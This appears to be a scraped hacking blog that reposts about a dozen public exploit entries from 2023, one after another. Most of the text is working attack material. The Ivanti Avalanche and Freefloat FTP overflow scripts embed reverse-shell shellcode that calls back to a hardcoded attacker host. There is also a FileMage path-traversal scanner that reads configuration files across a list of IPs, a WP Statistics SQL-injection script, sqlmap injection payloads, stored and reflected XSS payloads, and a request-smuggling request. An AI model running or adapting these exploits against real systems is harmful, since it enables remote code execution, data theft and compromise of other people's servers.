# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 30/07/2023
# Vendor: tdevs
# Vendor Homepage: https://tdevs.co/
# Software Link: https://hyiprio-feature.tdevs.co/
# Version: 2.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CVE: CVE-2023-4382
## Description
Allows Attacker to upload malicious files onto the server, such as Stored XSS
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /user/settings/profile-update HTTP/2
Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
Content-Type: image/png
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by Skalvin");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg
[-] Done
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109850
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
"""
Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
Date: 2023-08-16
Exploit Author: Robel Campbell (@RobelCampbell)
Vendor Homepage: https://www.ivanti.com/
Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
Version: v6.4.0.0
Tested on: Windows 11 21H2
CVE: CVE-2023-32560
Reference: https://www.tenable.com/security/research/tra-2023-27
"""
import socket
import struct
import sys
# Create an item structure for the header and payload
class Item:
def __init__(self, type_, name, value):
self.type = type_
self.name = name.encode()
self.value = value
self.name_size = 0x5
self.value_size = 0x800
def pack(self):
return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
self.type, self.name_size, self.value_size, self.name, self.value)
# Create a header structure
class HP:
def __init__(self, hdr, payload):
self.hdr = hdr
self.payload = payload
self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)
def pack(self):
return b''.join([item.pack() for item in self.hdr]) + \
b''.join([item.pack() for item in self.payload]) + self.pad
# Create a preamble structure
class Preamble:
def __init__(self, hp):
self.msg_size = len(hp.pack()) + 16
self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
self.payload_size = sum([len(item.pack()) for item in hp.payload])
self.unk = 0 # Unknown value
def pack(self):
return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)
# Create a message structure
class Msg:
def __init__(self, hp):
self.pre = Preamble(hp)
self.hdrpay = hp
def pack(self):
return self.pre.pack() + self.hdrpay.pack()
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
shellcode = b""
shellcode += b"fce8820000006089e531c064"
shellcode += b"8b50308b520c8b52148b7228"
shellcode += b"0fb74a2631ffac3c617c022c"
shellcode += b"20c1cf0d01c7e2f252578b52"
shellcode += b"108b4a3c8b4c1178e34801d1"
shellcode += b"518b592001d38b4918e33a49"
shellcode += b"8b348b01d631ffacc1cf0d01"
shellcode += b"c738e075f6037df83b7d2475"
shellcode += b"e4588b582401d3668b0c4b8b"
shellcode += b"581c01d38b048b01d0894424"
shellcode += b"245b5b61595a51ffe05f5f5a"
shellcode += b"8b12eb8d5d68333200006877"
shellcode += b"73325f54684c772607ffd5b8"
shellcode += b"9001000029c454506829806b"
shellcode += b"00ffd5505050504050405068"
shellcode += b"ea0fdfe0ffd5976a0568c0a8"
shellcode += b"561e680200115c89e66a1056"
shellcode += b"576899a57461ffd585c0740c"
shellcode += b"ff4e0875ec68f0b5a256ffd5"
shellcode += b"68636d640089e357575731f6"
shellcode += b"6a125956e2fd66c744243c01"
shellcode += b"018d442410c6004454505656"
shellcode += b"5646564e565653566879cc3f"
shellcode += b"86ffd589e04e5646ff306808"
shellcode += b"871d60ffd5bbe01d2a0a68a6"
shellcode += b"95bd9dffd53c067c0a80fbe0"
shellcode += b"7505bb4713726f6a0053ffd5"
buf = b'90' * 340
buf += b'812b4100' # jmp esp (0x00412b81)
buf += b'90909090'
buf += b'90909090'
buf += shellcode
buf += b'41' * 80
buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
buf += b'43' * (0x800 - len(buf))
buf2 = b'41' * 0x1000
# Create message payload
hdr = [Item(3, "pwned", buf)]
payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
hp_instance = HP(hdr, payload)
msg_instance = Msg(hp_instance)
# Default port
port = 1777
# check for target host argument
if len(sys.argv) > 1:
host = sys.argv[1]
else:
print("Usage: python3 CVE-2023-32560.py <host ip>")
sys.exit()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.sendall(msg_instance.pack())
print("Message sent!")
s.close()
# Exploit Title: Credit Lite 1.5.4 - SQL Injection
# Exploit Author: CraCkEr
# Date: 31/07/2023
# Vendor: Hobby-Tech
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
# Software Link: https://credit-lite.appshat.xyz/
# Version: 1.5.4
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4407
# CWE: CWE-89 - CWE-74 - CWE-707
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
## Steps to Reproduce:
To Catch the POST Request
1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement
2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]
Path: /portal/reports/account_statement
POST parameter 'date1' is vulnerable to SQL Injection
POST parameter 'date2' is vulnerable to SQL Injection
-------------------------------------------------------------------------
POST /portal/reports/account_statement HTTP/2
_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001
-------------------------------------------------------------------------
---
Parameter: date1 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001
Parameter: date2 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001
---
[-] Done
# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 2023-08-19
# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar
# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf
# Vulnerability Type: Buffer Overflow Local
# Tested On: Windows 10 64bit
# Tested Version: 5.0
# Steps to Reproduce:
# 1- Run the python script and create exploit.txt file
# 2- Open the application and log in
# 3- Click the "Config" button in the upper menu
# 4- Click the "User" button just below it
# 5- Now click the "Add users" button in the lower left
# 6- Fill in the Username, Password, and Confirm boxes
# 7- Paste the characters from exploit.txt into the Contact box
# 8- Click OK and crash!
#!/usr/bin/env python3
exploit = 'A' * 846
try:
with open("exploit.txt","w") as file:
file.write(exploit)
print("POC is created")
except:
print("POC not created")
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.
# Steps to reproduce Stored XSS:
Go to url http://localhost/admin/plugin/gallery/edit/2.
When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.
With the following payload we can achieve the XSS
Payload:
<div><p title="</div><svg/onload=alert(document.domain)>">
#PoC Request:
POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1
gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
# Date: 2023/08/18
# CVE: CVE-2023-38910
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.
# Steps to reproduce Stored XSS:
Go to url http://localhost/admin/carousel.
We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.
We can inject HTML code.
With the following payload we can achieve the XSS.
Payload:
<div><p title="</div><svg/onload=alert(document.domain)>">
#PoC Request:
POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1
carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Allows Attacker to upload malicious files onto the server, such as Stored XSS
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2
-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
[-] Done
#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3
#!/usr/bin/python
import socket
#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'
#nc -lvp 4444
#Send exploit
#offset = 247
#badchars=\x00\x0d\
#return_address=\x3b\x69\x5a\x77 (ole32.dll)
payload = (
"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
"\x19")
shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload
def main():
ip = '192.168.146.135'
port = 21
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.recv(1024)
sock.send('USER anonymous\r\n')
sock.recv(1024)
sock.send('PASS anonymous\r\n')
sock.recv(1024)
sock.send('pwd ' + shellcode + '\r\n')
sock.close()
if __name__ == '__main__':
main()
# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513
In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.
## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]
## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]
data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9
# CVE : CVE-2023-39026
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html
import requests
import warnings
warnings.filterwarnings("ignore")
def worker(url):
response = requests.get(url, verify=False, timeout=.5)
return response
def main():
listIP = []
file_path = input("Enter the path to the file containing the IP addresses: ")
with open(file_path, 'r') as file:
ip_list = file.read().splitlines()
searchString = "tls"
for ip in ip_list:
url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
try:
response = worker(url)
#print(response.text)
if searchString in response.text:
print("Vulnerable IP: " + ip)
print(response.text)
listIP.append(ip)
except requests.exceptions.RequestException as e:
print(f"Error occurred for {ip}: {str(e)}")
for x in listIP:
print(x)
if __name__ == '__main__':
main()
#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro
-------------Discovering Unquoted Path--------------
C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KingoSoftService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KingoSoftService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Anish>systeminfo
Host Name: DESKTOP-UT7E7CF
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information
# Date : 25-08-2023
# Exploit Author : tahaafarooq
# Vendor Homepage : https://dlink.com/
# Version : FRU2.2.15.8
# Tested on: DLINK DPH-400SE (VoIP Phone)
Description:
With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200
POC :
1. Login with the default guest credentials "guest:guest"
2. Access the Maintenance tab.
3. Under the maintenance tab, access the "Access" feature
4. On "Account Option" choose a user to modify, thus "Admin" and click modify.
5. Right click on the password, and click reveal, the password is then seen in plaintext.
## Title: Member Login Script 3.3 - Client-side desync
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## Description:
The server appears to be vulnerable to client-side desync attacks. A
POST request was sent to the path '/1692959852_473/index.php' with a
second request sent as the body. The server ignored the Content-Length
header and did not close the connection, leading to the smuggled
request being interpreted as the next request.
STATUS: HIGH Vulnerability
[+]Exploit:
```
POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
Cookie: _ga=GA1.2.2069938240.1692907228;
_gid=GA1.2.1275975650.1692907228; _gat=1;
_fbp=fb.1.1692907228280.366290059;
_ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
YellowPages=slk3eokcgmdf0r3t7c020quv35;
pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 1190
Content-Type: application/x-www-form-urlencoded
GET /robots.txt HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
GET /robots.txt HTTP/2
Host: www.pornhub.com
Cookie: platform=pc; ss=405039333413129808;
fg_0d2ec4cbd943df07ec161982a603817e=60256.100000;
fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Full-Version: ""
Sec-Ch-Ua-Arch: ""
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Platform-Version: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Full-Version-List:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
## Time spend:
00:35:00
# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
# Date: 13/02/2022
# Exploit Author: psychoSherlock
# Vendor Homepage: https://wp-statistics.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip
# Version: 13.1.5 and prior
# Tested on: wp-statistics 13.1.5
# CVE : CVE-2022-25148
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# CVSS Score: 8.4 (High)
import argparse
import requests
import re
import urllib.parse
def main():
parser = argparse.ArgumentParser(description="CVE-2022-25148")
parser.add_argument('-u', '--url', required=True,
help='Wordpress base URL')
args = parser.parse_args()
baseUrl = args.url
payload = "IF(1=1, sleep(5), 1)"
wp_session = requests.session()
resp = wp_session.get(baseUrl)
nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)
print(f"Gathered Nonce: {nonce}")
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload = urllib.parse.quote_plus(payload)
exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id={payload}&search_query&page_uri=/&user_id=0'
exploit_url = baseUrl + exploit
print(f'\nSending: {exploit_url}')
resp = wp_session.get(exploit_url, headers=headers)
if float(resp.elapsed.total_seconds()) >= 5.0:
print("\n!!! Target is vulnerable !!!")
print(f'\nTime taken: {resp.elapsed.total_seconds()}')
else:
print('Target is not vulnerable')
if __name__ == "__main__":
main()
# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4547
# CWE: CWE-79 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /search
GET parameter 'filter[brandid]' is vulnerable to XSS
GET parameter 'filter[price]' is vulnerable to XSS
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB
XSS Payloads:
vnxjb"><script>alert(1)</script>bvu51
[-] Done
# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4548
# CWE: CWE-89 / CWE-74 / CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /search
GET parameter 'filter[brandid]' is vulnerable to SQL Injection
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black
---
Parameter: filter[brandid] (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black
---
[-] Done
## Title: Bus Reservation System-1.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `pickup_id` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the pickup_id parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. The attacker can steal
information from all database!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: pickup_id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
(CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT
2098) END))&session_id=
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT
(ELT(5210=5210,1))),0x716a6b7171),5210)&session_id=
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
2616 FROM (SELECT(SLEEP(15)))clIR)&session_id=
---
```
## Reproduce:
